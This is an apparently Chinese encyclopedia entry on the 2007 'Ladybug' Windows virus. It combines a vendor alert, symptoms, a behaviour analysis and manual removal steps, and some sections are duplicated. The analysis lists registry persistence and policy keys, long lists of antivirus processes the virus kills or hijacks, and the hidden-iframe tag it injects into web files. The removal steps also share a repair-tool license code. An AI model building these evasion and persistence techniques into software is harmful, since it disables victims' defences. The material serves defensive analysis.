请输入您要查询的百科知识:

 

词条 瓢虫病毒
释义

2007年12月18日,金山毒霸全球反病毒监测中心发布圣诞期间紧急病毒预警,行为极度恶劣的“瓢虫”病毒新变种(Win32.Troj.Downloader.vb.237568)预计在圣诞节前后大面积发作,感染电脑内将爬满“瓢虫”,广大用户需高度警惕。金山毒霸反病毒专家戴光剑表示,“瓢虫病毒集熊猫烧香、AV终结者等年内重大病毒破坏性于一身,虽然目前病毒本身还有些缺陷,但随着新变种的不断出现,其破坏程度不容小觑。”

病毒介绍

12月18日,金山毒霸全球反病毒监测中心发布圣诞期间紧急病毒预警,行为极度恶劣的“瓢虫”病毒新变种(Win32.Troj.Downloader.vb.237568)预计在圣诞节前后大面积发作,感染电脑内将爬满“瓢虫”,广大用户需高度警惕。

金山毒霸反病毒专家戴光剑表示,“瓢虫病毒集熊猫烧香、AV终结者等年内重大病毒破坏性于一身,虽然目前病毒本身还有些缺陷,但随着新变种的不断出现,其破坏程度不容小觑。”

据了解,“瓢虫”病毒与熊猫烧香类似,感染性极强,用户电脑一旦感染该病毒,除系统盘,被感染后的exe文件图标将变成绿色的“小飘虫”;同时,用户电脑内的浏览器、任务管理器、文件夹选项、系统时间等项目都将遭受破坏。戴光剑指出,这是一个感染性极强的病毒,病毒运行后,用户电脑将表现出五大“中毒”症状:

1、电脑运行速度立刻变慢,杀毒软件无法正常使用;

2 、 系统时间被修改为2030年,使依赖系统时间的软件全部失效;

3、浏览器首页被篡改。当用户打开浏览器,会发现首页被修改为一个伪装的“百度”,由于该网址同样具有正常的搜索功能,所以极具容易迷惑性;

4、“任务管理器”和“文件夹选项”遭屏蔽。如果用户想使用“任务管理器”和“文件夹选项”来查看是谁在系统中捣鬼,会发现这两个功能都被病毒屏蔽掉;而当用户试图打开注册表时,会弹出一个对话框,提示“注册表编辑已被管理员停用”;再仔细检查,会发现连System32文件夹都不见了,病毒已经把自己隐藏得非常深;

5、硬盘、软驱、光驱自动共享。用户打开“我的电脑”时,可发现机器的硬盘以及软驱、光驱全部已经自动设置成共享状态,并且这种共享还被病毒锁死,无法改回正确的设置。这样,只要有谁愿意,都可以一览无遗地浏览用户电脑中的资料。

金山毒霸反病毒工程师分析指出,病毒潜入用户电脑系统后,会在系统盘中释放出6个病毒文件,分别为%windows%\\system32\\目录下的AUTORUN.INF、netshare.cmd、Avpser.cmd、Taskeep.vbs、SDGames.exe,以及%windows%下的system.ini。除此而外,病毒还在全部磁盘的根目录下生成AUTORUN.INF、Recycleds.url、SDGames.exe、Windows.url、新建文件夹.url等文件。

根据瓢虫病毒的传播特点,金山毒霸反病毒应急中心及时进行了病毒库更新,升级毒霸到2007年12月18的病毒库即可查杀以上病毒;如未安装金山毒霸,可以免费下载最新版金山毒霸2008或使用金山毒霸在线杀毒来防止病毒入侵。拨打金山毒霸反病毒急救电话010—82331816,反病毒专家将为您提供帮助。

年终岁末是病毒的高发期,金山毒霸反病毒工程师建议广大用户:1、最好安装专业的杀毒软件进行全面监控,防范日益增多的病毒。用户在安装反病毒软件之后,应将一些主要监控经常打开(如邮件监控、内存监控等)、经常进行升级、遇到问题要上报,这样才能真正保障计算机的安全。2、由于玩网络游戏、利用QQ聊天的用户数量逐渐增加,所以各类盗号木马必将随之增多,建议用户一定要养成良好的网络使用习惯,及时升级杀毒软件,开启防火墙以及实时监控等功能,切断病毒传播的途径,不给病毒以可乘之机。

症状

截杀"小瓢虫"病毒

据了解,“瓢虫”病毒与熊猫烧香类似,感染性极强,用户电脑一旦感染该病毒,除系统盘,被感染后的exe文件图标将变成绿色的“小飘虫”;同时,用户电脑内的浏览器、任务管理器、文件夹选项、系统时间等项目都将遭受破坏。戴光剑指出,这是一个感染性极强的病毒,病毒运行后,用户电脑将表现出五大“中毒”症状: 1、电脑运行速度立刻变慢,杀毒软件无法正常使用;

2、系统时间被修改为2030年,使依赖系统时间的软件全部失效;

3、浏览器首页被篡改。当用户打开浏览器,会发现首页被修改为一个伪装的“百度”,由于该网址同样具有正常的搜索功能,所以极具容易迷惑性;

4、“任务管理器”和“文件夹选项”遭屏蔽。如果用户想使用“任务管理器”和“文件夹选项”来查看是谁在系统中捣鬼,会发现这两个功能都被病毒屏蔽掉;而当用户试图打开注册表时,会弹出一个对话狂,提示“注册表编辑已被管理员停用”;再仔细检查,会发现连System32文件夹都不见了,病毒已经把自己隐藏得非常深;

5、硬盘、软驱、光驱自动共享。用户打开“我的电脑”时,可发现机器的硬盘以及软驱、光驱全部已经自动设置成共享状态,并且这种共享还被病毒锁死,无法改回正确的设置。这样,只要有谁愿意,都可以一览无遗地浏览用户电脑中的资料。

瓢虫病毒

金山毒霸反病毒工程师分析指出,病毒潜入用户电脑系统后,会在系统盘中释放出6个病毒文件,分别为%windows%\\system32\\目录下的AUTORUN.INF、netshare.cmd、Avpser.cmd、Taskeep.vbs、SDGames.exe,以及%windows%下的system.ini。除此而外,病毒还在全部磁盘的根目录下生成AUTORUN.INF、Recycleds.url、SDGames.exe、Windows.url、新建文件夹.url等文件。

根据瓢虫病毒的传播特点,金山毒霸反病毒应急中心及时进行了病毒库更新,升级毒霸到2007年12月18的病毒库即可查杀以上病毒;如未安装金山毒霸,可以免费下载最新版金山毒霸2008或使用金山毒霸在线杀毒来防止病毒入侵。拨打金山毒霸反病毒急救电话010—82331816,反病毒专家将为您提供帮助。

年终岁末是病毒的高发期,金山毒霸反病毒工程师建议广大用户:1、最好安装专业的杀毒软件进行全面监控,防范日益增多的病毒。用户在安装反病毒软件之后,应将一些主要监控经常打开(如邮件监控、内存监控等)、经常进行升级、遇到问题要上报,这样才能真正保障计算机的安全。2、由于玩网络游戏、利用QQ聊天的用户数量逐渐增加,所以各类盗号木马必将随之增多,建议用户一定要养成良好的网络使用习惯,及时升级杀毒软件,开启防火墙以及实时监控等功能,切断病毒传播的途径,不给病毒以可乘之机。

病毒分析和删除

主要表现

病毒样本来自卡饭,病毒行为恶劣,主要表现为:

1.攻击杀毒软件之后进行IFEO映像劫持

2.感染htm等网页文件

3.感染或覆盖exe等可执行文件

4.破坏安全模式

5.破坏显示隐藏文件 文件夹选项等

6.修改系统时间并锁定时间

7.可通过U盘等移动存储传播

8.关闭Windows防火墙等服务并打开许多危险服务,并使得用户磁盘被共享

9.后台添加账户并设定管理员权限

10.修改某些文件关联

下面为具体分析

File: SDGames.exe

Size: 59282 bytes

File Version: 3.02

Modified: 2007年12月6日, 17:56:32

MD5: FC334FFCF5AFF3CA8235705D61F62990

SHA1: 4DFFE9E9BB666A13CC646EBA4371BDF4AFFB49BC

CRC32: 1DD096C2

1.病毒运行后,释放如下文件或副本

%systemroot%\\system32\\SDGames.exe

%systemroot%\\system32\\Taskeep.vbs

%systemroot%\\system32\\Avpser.cmd

%systemroot%\\system32\etshare.cmd

%systemroot%\\system32\\AUTORUN.INF

在每个磁盘分区释放SDGames.exe和AUTORUN.INF 达到通过U盘传播的目的(首先通过rd命令删除 autorun.inf文件夹 使得某些通过此种方法免疫U盘病毒的方式失效)

并且在每个分区释放Windows.url,新建文件夹.url,Recycleds.url指向该分区根目录下的SDGames.exe

诱使用户点击

2.修改

reg和txt文件关联指向%systemroot%\\system32\\SDGames.exe

3.删除

HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\etwork\\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\{4D36E967-E325-11CE-BFC1-08002BE10318}

HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\etwork\\{4D36E967-E325-11CE-BFC1-08002BE10318}

破坏安全模式

4.创建自启动项目

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows]

<load><%systemroot%\\system32\\SDGames.exe> [SDGame]

<run><%systemroot%\\system32\\SDGames.exe> [SDGame]

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]

<Winstary><%systemroot%\\system32\\SDGames.exe> [SDGame]

5.破坏系统的一些功能

禁用cmd:HKCU\\Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD

破坏显示隐藏文件:HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden

HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\CheckedValue

使得文件扩展名无法显示:

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt

隐藏控制面板:

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oControlPanel

禁用注册表编辑器

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistrytools

禁用任务管理器

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr

修改IE主页为:http://www.*.

修改IE默认页为:wangma

隐藏文件夹选项

HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oFolderOptions

6.关闭如下服务并将其启动类型设为禁用

Alg

sharedaccess

wuauserv

7.开启下列服务并将其启动类型设为自动

Terminal Services

winmgmt

lanmanserver

8.%systemroot%\\system32\etshare.cmd将用户的所有磁盘设为共享

9.添加一个名为guest的账户,

并将其设置为管理员权限

10.攻击反病毒软件

,利用Avpser.cmd强制结束一些杀毒软件进程

RavMonD.exe

RavStub.exe

Anti*

AgentSvr*

CCenter*

Rsaupd*

SmartUp*

FileDsty*

RegClean*

360tray*

360safe*

kabaload*

safelive*

KASTask*

kpFW32*

kpFW32X*

KvXP_1*

KVMonXP_1*

KvReport*

KvXP*

KVMonXP*

nter*

TrojDie*

Trojan*

KvNative*

Virus*

Filewall*

Kaspersky*

JiangMin*

RavMonD*

RavStub*

RavTask*

adam*

cSet*

PFWliveUpdate*

mmqczj*

Trojanwall*

Ras.exe

runiep.exe

avp.exe

PFW.exe

rising*

ikaka*

.duba*

kingsoft*

木马*

社区*

aswBoot*

MainCon*

Regs*

AVP*

Task*

regedit*

Ras*

srgui*

norton*

avp*

fire*

spy*

bullguard*

PersFw*

KAV*

ZONEALARM*

SAFEWEB*

OUTPOST*

ESAFE*

clear*

BLACKICE*

360safe.exe

Shadowservice.exe

v3webnt.exe

v3sd32.exe

v3monsvc.exe

sysmonnt.exe

hkcmd.exe

DNTUS26.EXE

AhnSD.exe

CTFMON.EXE

MonsysNT.exe

awrem32.exe

WINAW32.EXE

PNTIOMON.exe

avgw.exe

avgcc32.exe

PROmon.exe

PNTIOMON.exe

MagicSet.exe

MainCon.exe

TrCleaner.exe

WmNetPro.exe

修复*

保护*

11.映像劫持杀毒软件和一些常用工具

360rpt.exe

360Safe.exe

360tray.EXE

adam.exe

AgentSvr.exe

AppSvc32.exe

autoruns.exe

avgrssvc.exe

AvMonitor.exe

avp.exe

CCenter.exe

ccSvcHst.exe

FileDsty.exe

FTCleanerShell.exe

HijackThis.exe

IceSword.exe

iparmo.exe

Iparmor.exe

isPwdSvc.exe

kabaload.exe

KaScrScn.SCR

KASMain.exe

KASTask.exe

KAV32.exe

KAVDX.exe

KAVPFW.exe

KAVSetup.exe

KAVStart.exe

KISLnchr.exe

KMailMon.exe

KMFilter.exe

Knod32kui.exe

KPFW32.exe

KPFW32X.exe

KPFWSvc.exe

KRegEx.exe

KsLoader.exe

KVCenter.kxp

KvDetect.exe

KvfwMcl.exe

KVMonXP.kxp

KVMonXP_1.kxp

kvol.exe

kvolself.exe

KvReport.kxp

KVScan.kxp

KVSrvXP.exe

KVStub.kxp

kvupload.exe

kvwsc.exe

KvXP.kxp

KvXP_1.kxp

KWatch9x.exe

KWatchX.exe

loaddll.exe

MagicSet.exe

MainCon.exe

mcconsol.exe

mmqczj.exe

mmsk.exe

msconfig.exe

NAVSetup.exe

nod32krn.exe

PFW.exe

PFWLiveUpdate.exe

QHSET.exe

QQ.exe

Ras.exe

Rav.exe

RavMon.exe

RavMonD.exe

RavStub.exe

RavTask.exe

RegClean.exe

rfwcfg.exe

RfwMain.exe

rfwProxy.exe

rfwsrv.exe

Rsaupd.exe

runiep.exe

safelive.exe

scan32.exe

Shadowservice.exe

shcfg32.exe

SmartUp.exe

SREng.exe

srgui.exe

symlcsvc.exe

SysSafe.exe

TrojanDetector.exe

Trojanwall.exe

TrojDie.kxp

UIHost.exe

UmxAgent.exe

UmxAttachment.exe

UmxCfg.exe

UmxFwHlp.exe

UmxPol.exe

UpLive.EXE.exe

WoptiClean.exe

zxsweep.exe

12.遍历感染非系统分区的exe文件(覆盖方式)

13.遍历感染非系统分区的jsp asp php htm html hta文件

在其末尾加入<iframe id="iframe" width="0" height="0" scrolling="no" frameborder="0" src="http://*." name="Myframe"

align="center" border="0">的代码

14.修改系统时间的年份为2030年,并禁止用户修改时间

15.隐藏系统文件夹

解决办法

下载sreng:http://download.files/sreng2.zip

Icesword:http://mail.~jfpan/download/IceSword122cn.zip

1.解压缩Icesword

把Icesword改名为1.exe运行

进程中 找到SDGames.exe 右击它 结束进程

然后点击 Icesword左下角的 文件 按钮

找到如下文件并删除

%systemroot%\\system32\\SDGames.exe

%systemroot%\\system32\\Taskeep.vbs

%systemroot%\\system32\\Avpser.cmd

%systemroot%\\system32\etshare.cmd

%systemroot%\\system32\\AUTORUN.INF

以及各个分区下面的

SDGames.exe,AUTORUN.INF,Windows.url,新建文件夹.url,Recycleds.url

2.运行sreng

(由于时间已经被改为2030年 所以sreng会弹出过期提示,不用担心,输入下面的授权码即可使用)

用户名:teyqiu

授权号:2-6-1-2-9-0-2-7-5-4-1-1-8-5-4-3-1-4-0-9-0-1-3-5-5-6(去掉“-”就是了)

打开sreng后 点击 系统修复-文件关联-修复

系统修复-Windows Shell/IE -全选-修复

高级修复-修复安全模式

3.还是sreng中

启动项目 注册表 删除如下项目

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows]

<load><%systemroot%\\system32\\SDGames.exe> [SDGame]

<run><%systemroot%\\system32\\SDGames.exe> [SDGame]

[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]

<Winstary><%systemroot%\\system32\\SDGames.exe> [SDGame]

并删除所有红色的IFEO项目

启动项目 System.ini

删除Windows节点

4.取消磁盘共享

开始 运行 输入cmd 输入如下命令

net share c /delete

net share d /delete

...

以此类推 分别取消所有磁盘分区的共享

5.显示系统文件夹

开始 运行 输入cmd 输入如下命令

attrib -h %systemroot%\\system32

6.修复受感染的htm等网页文件

推荐使用CSI的iframkill

预防

这个病毒看起来象熊猫烧香和AV终结者的结合体,阳光以前曾给过一个详细的分析。如果这个病毒把感染做的完美些(现在病毒还不是真正意义上的感染,是用病毒体完全覆盖正常EXE),会不会造成和李俊版熊猫烧香一样的效果呢,完全有可能。

以下是关于该病毒的详细分析报告:

一.病毒信息

病毒名:Win32.Troj.Serwer.yx

病毒中文名称:小瓢虫

二.病毒行为:

这是一个感染型病毒,把会计算机上的系统时间改为2030年,在系统盘的system32文件夹下释放多个病毒文件。

在计算机上的每个盘下生成SDGames.exe和Autorun.inf两个文件,以达到通过双击该盘时病毒可以运行起来。

在每个盘下生成三个Url文件,都指向该盘下的SDGame.exe文件,三个Url文件具有迷惑性的图标。可以查看这三个URL的属性,会发现都指向c:\\sdgame.exe。

通过添加注册表启动项以达到开机时病毒能运行起来,通过修改注册表破坏系统安全模式,禁用大部分系统功能:包括,禁用任务管理器,禁用控制面板,禁止修改系统配置,锁定主页,禁用注册表编辑器等。

映像劫持了大量软件,被劫持的软件包括“杀毒软件”,“系统检测工具”,“QQ”,(连QQ都不让用,这病毒够BT)

感染计算机上的exe文件,感染方式为覆盖数据。(除系统盘外,其它盘的EXE都被替换为小瓢虫图标)

感染计算机上的hta,html,htm,jsp,php,asp后缀的文件,插入网页代码.(除系统盘外,这一点和熊猫烧香的传播方式相同,有可能会造成网站大面积挂马)

把计算机上的所有盘设为所有人完全共享,(这是尼姆达病毒最常用的手段,当然,目的就是在局域网中大面积传播了。)

病毒运行后释放以下文件:

%systemroot%\\system32\\Taskeep.vbs

%systemroot%\\system32\\SDGames.exe

%systemroot%\\system32\\Avpser.cmd

%systemroot%\\system32\etshare.cmd

%systemroot%\\system32\\AUTORUN.INF

Taskeep.vbs的作用是运行起病毒进程

netshare.cmd的作用是打开本机的共享

Avpser.cmd用于结束计算机上的大量杀毒软件、安全检测软件,常见杀毒软件都在被攻击之列。

病毒在计算机上的每个盘下生成SDGame.exe和Autorun.inf,并生成Recycleds.url,Windows.url,新建文件夹.url三个文件,诱使用户双击。这三个文件都指向该盘下的SDGame.exe文件。(Recycleds.url的图标为“回收站”,其余两个图标为“文件夹图标”)

病毒创建注册表启动项,添加服务;

把计算机上为以下后缀名的文件插入代码:(除系统盘外)

".hta"

".html"

".htm"

".php"

".asp"

".jsp"

插入的代码:

感染计算机上的exe文件,感染方式为覆盖数据.(除系统盘,被感染后的exe文件图标为绿色的小飘虫)

修改计算机上的reg和txt文件关联指向"%systemroot%\\system32\\SDGames.exe"

把计算机上的系统时间改为2030年,中国木马制作者的惯用手法。

通过修改注册表的方式破坏安全模式。

禁用cmd:

HKEY_CURRENT_USER\\Software\\Policies\\Microsoft\\Windows\\System\\DisableCMD

破坏显示隐藏文件:

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Hidden

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\Folder\\Hidden\\SHOWALL\\CheckedValue

使得文件扩展名无法显示:

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced\\HideFileExt

隐藏控制面板:

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oControlPanel

禁用注册表编辑器:

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistrytools

禁用任务管理器:

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableTaskMgr

修改IE主页为: http://www.zhidaobaidu.

隐藏文件夹选项:

HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\oFolderOptions

映像劫持常用安全软件,这次连杀毒软件的命令行查毒都没放过。

随便看

 

百科全书收录4421916条中文百科知识,基本涵盖了大多数领域的百科知识,是一部内容开放、自由的电子版百科全书。

 

Copyright © 2004-2023 Cnenc.net All Rights Reserved
更新时间:2025/2/5 3:07:43